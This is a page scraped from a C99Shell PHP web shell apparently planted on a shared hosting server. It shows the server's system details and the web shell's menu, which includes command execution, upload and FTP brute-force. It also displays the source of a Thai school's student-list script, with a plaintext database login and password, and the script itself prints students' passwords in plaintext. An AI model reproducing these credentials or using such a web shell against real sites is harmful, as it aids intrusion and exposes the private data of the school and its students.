!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/5.6.40 

uname -a: Linux cpanel06wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.80.el6.x86_64 #1 SMP Thu Sep 24
01:42:00 EDT 2020 x86_64
 

uid=851(cp949260) gid=853(cp949260) groups=853(cp949260) 

Safe-mode: OFF (not secure)

/home/cp949260/.trash/   drwx------
Free 237.92 GB of 981.82 GB (24.23%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     std.php (1.53 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<html>
<head>
<title>รายชื่อนักเรียนที่ลงทะเบียน & วิชาวิทยาการคำนวณ</title>
<h2 align ="center"><b>รายชื่อนักเรียนที่ลงทะเบียนทั้งหมด </b></h2>
</head>
<body>
<?php
$objConnect 
mysql_connect("localhost","cp949260_teacher","srk4437123") or die("Error Connect to Database");
$objDB mysql_select_db("cp949260_teacher");
$strSQL "SELECT * FROM testee";
$objQuery mysql_query($strSQL) or die ("Error Query [".$strSQL."]");
?>
<table width="650" border="1">
  <tr>
    <th width="42"> <div align="center">No </div></th>
    <th width="102"> <div align="center">login</div></th>
    <th width="70"> <div align="center">รหัสผ่าน</div></th>
    <th width="158"> <div align="center">ชื่อ</div></th>
    <th width="120"> <div align="center">นามสกุล</div></th>
    <th width="95"> <div align="center">รหัสประจำตัว</div></th>
  </tr>
<?php
$i 
1;
while(
$objResult mysql_fetch_array($objQuery))
{
?>
  <tr>
    <td><div align="center"><?php echo $i;?></div></td>
    <td><div align="center"><?php echo $objResult["login"];?></div></td>
    <td><?php echo $objResult["password"];?></td>
    <td><?php echo $objResult["firstname"];?></td>
    <td><div align="center"><?php echo $objResult["lastname"];?></div></td>
    <td align="right"><?php echo $objResult["code"];?></td>
  </tr>
<?php
        $i
++;
}
?>
</table>
<?php
mysql_close
($objConnect);
?>
</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0798 ]--